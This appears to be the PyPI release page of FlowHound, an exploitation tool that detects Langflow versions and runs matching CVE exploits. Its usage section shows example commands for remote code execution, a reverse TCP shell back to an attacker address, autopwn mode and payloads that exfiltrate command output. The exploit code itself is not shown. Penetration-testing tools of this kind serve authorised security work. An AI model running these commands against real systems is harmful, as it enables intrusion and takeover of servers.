FlowHound
Automated exploitation platform for scanning and testing insecure Langflow deployments.
Documentation
Full documentation is available at flowhound.readthedocs.io.
Installation
pip install .
Usage
FlowHound exposes two sub-commands: attack and sniff.
attack — launch exploits against a target
flowhound attack --url <target-url> [OPTIONS]
| Option | Required | Description |
|---|---|---|
--url |
Yes | URL of the target Langflow instance (e.g. http://localhost:7860) |
--username |
No | Langflow username — must be paired with --password |
--password |
No | Langflow password — must be paired with --username |
--autopwn |
No | Run all matching exploits instead of stopping at the first success |
--proxy |
No | HTTP(s) proxy to route traffic through (e.g. http://127.0.0.1:8080) |
--command |
No | Shell command to execute on the target via the execute_bash_command payload |
--reverse_shell |
No | LHOST:LPORT for a reverse TCP shell payload (e.g. 192.168.1.10:4444) |
-h, --help |
No | Show help message |
--commandand--reverse_shellare mutually exclusive.--usernameand--passwordmust always be supplied together.
sniff — detect version and list applicable CVEs
flowhound sniff --url <target-url> [--proxy <proxy-url>]
| Option | Required | Description |
|---|---|---|
--url |
Yes | URL of the target Langflow instance |
--proxy |
No | HTTP(s) proxy to route traffic through |
-h, --help |
No | Show help message |
Examples
Unauthenticated attack (stops at first successful exploit):
flowhound attack --url http://target.example.com:7860
Authenticated attack (includes auth-required CVEs):
flowhound attack --url http://target.example.com:7860 --username admin --password secret
Run all matching exploits with a custom command payload:
flowhound attack --url http://target.example.com:7860 --autopwn --command "whoami"
Catch a reverse shell:
flowhound attack --url http://target.example.com:7860 --reverse_shell 192.168.1.10:4444
Route all traffic through a proxy:
flowhound attack --url http://target.example.com:7860 --proxy http://127.0.0.1:8080
Detect the target Langflow version and list applicable CVEs without launching any exploits:
flowhound sniff --url http://target.example.com:7860
Architecture
How it works
- Version detection — queries
/api/v1/versionon the target to determine the running Langflow version. - CVE lookup — queries the bundled
vulnerabilities.jsondatabase for CVE records whose affected version range covers the detected version. Authentication-required exploits are only included when credentials are supplied. - Exploit dispatch — dynamically loads each matching exploit module and executes it. Unauthenticated RCE exploits are prioritised. Each exploit is run with a 60-second timeout; timed-out exploits are skipped automatically.
- Payload injection — when
--commandor--reverse_shellis specified the corresponding payload is injected into each exploit rather than the built-in default.
CVE coverage
| CVE ID | CVSS | Auth Required | Affected Versions |
|---|---|---|---|
| CVE-2026-9198 | 10.0 | No | 1.0.0 – 1.10.0 |
| CVE-2026-0768 | 9.8 | No | 1.4.2 |
| CVE-2026-19295 | 9.9 | Yes | 1.0.0 – 1.11.1 |
| CVE-2026-19286 | 9.8 | Yes | 1.11.0 – 1.11.1 |
| CVE-2026-18729 | 8.8 | Yes | 1.0.0 – 1.11.1 |
| CVE-2026-5027 | 8.8 | Yes | 1.0.0 – 1.8.4 |
| CVE-2026-7873 | 8.8 | Yes | 1.0.0 – 1.10.0 |
| CVE-2026-10134 | 8.8 | Yes | 1.0.0 – 1.9.3 |
Payloads
| Payload | CLI flag | Description |
|---|---|---|
execute_bash_command |
--command "<cmd>" |
Runs an arbitrary shell command and exfiltrates stdout |
reverse_tcp_shell |
--reverse_shell LHOST:LPORT |
Opens a reverse TCP shell back to the attacker (blocking) |
When no payload flag is given each exploit falls back to its built-in default (runs id and exfiltrates the result).
Project structure
flowhound/
├── __main__.py # CLI entry point; registers attack and sniff commands
├── cli/
│ ├── command.py # attack and sniff Click command definitions
│ ├── validators.py # URL, proxy, and CVE input validators
│ ├── banner.py # ASCII-art banner
│ └── message_format.py # Coloured logging handler (ClickLogHandler)
└── vulnerabilities/
├── cve/cve.py # CVE data model; dynamically loads exploit modules
├── io/
│ ├── database.py # Reads vulnerabilities.json; filters by version & auth
│ ├── version_detection.py # Queries /api/v1/version; version string ↔ tuple helpers
│ └── vulnerabilities.json # Bundled CVE data store
├── exploits/
│ ├── base_exploit_class.py # Abstract base; auto_login / authenticate helpers
│ └── cve_2026_*.py # Individual exploit PoC modules
└── payloads/
├── base_payload_class.py # Abstract base; generate_payload / load_payload interface
├── execute_bash_command.py
└── reverse_tcp_shell.py
Requirements
- Python 3.10+
requests >= 2.32.3click >= 8.1.8
Running tests
pip install pytest
pytest flowhound/tests/
Disclaimer
FlowHound is intended for authorised security testing only. Do not run it against systems you do not own or have explicit written permission to test.
Metadata
Release files for flowhound 1.0.0
For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.
Source distribution (sdist)
| File | Size | Uploaded | |
|---|---|---|---|
| flowhound-1.0.0.tar.gz | 29.3 kB | Details |
Built distribution (wheel)
| File | Interpreter | ABI | Platform | Reset |
|---|---|---|---|---|
| flowhound-1.0.0-py3-none-any.whl | Python 3 | none | any | Details |
Total release size: 72.2 kB
Release files / flowhound-1.0.0.tar.gz
| Download URL | flowhound-1.0.0.tar.gz |
|---|---|
| Size | 29.3 kB |
| Tags | Source |
|
SHA-256 checksum How to use checksums |
4d99725f84be11b5d1713f78bc75504abed8f600499a8d357d17499bdcc9cc71
|
|
BLAKE2b-256 checksum How to use checksums |
2291e87c6a26218f143ce7c1f39297555c73db7ccdf52a52c3b00e6016622290
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
Yes |
| Uploaded via |
twine/7.0.0 CPython/3.13.14
|
Provenance
Provenance describes where a file came from. On PyPI, provenance is shared via attestations, which provide a verifiable record of the build or publishing details. View details, limitations and caveats.
PyPI Publish Attestation
PyPI verified that this artifact, at this checksum, originated from the publisher listed below.
Signed by GitHub Actions, verified by PyPI on Sep 21, 2026.
Transparency logRelease files / flowhound-1.0.0-py3-none-any.whl
| Download URL | flowhound-1.0.0-py3-none-any.whl |
|---|---|
| Size | 42.9 kB |
| Tags | Python 3 |
|
SHA-256 checksum How to use checksums |
808a158b891a8b5fa0e7cd8fe9d618c9bcefd2dd7fdeec8a3a3407c6eb087959
|
|
BLAKE2b-256 checksum How to use checksums |
b81f4084474512b42e56720c3472afb9e00193f48414a099f79c9cbe76ed6da1
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
Yes |
| Uploaded via |
twine/7.0.0 CPython/3.13.14
|
Provenance
Provenance describes where a file came from. On PyPI, provenance is shared via attestations, which provide a verifiable record of the build or publishing details. View details, limitations and caveats.
PyPI Publish Attestation
PyPI verified that this artifact, at this checksum, originated from the publisher listed below.
Signed by GitHub Actions, verified by PyPI on Sep 21, 2026.
Transparency log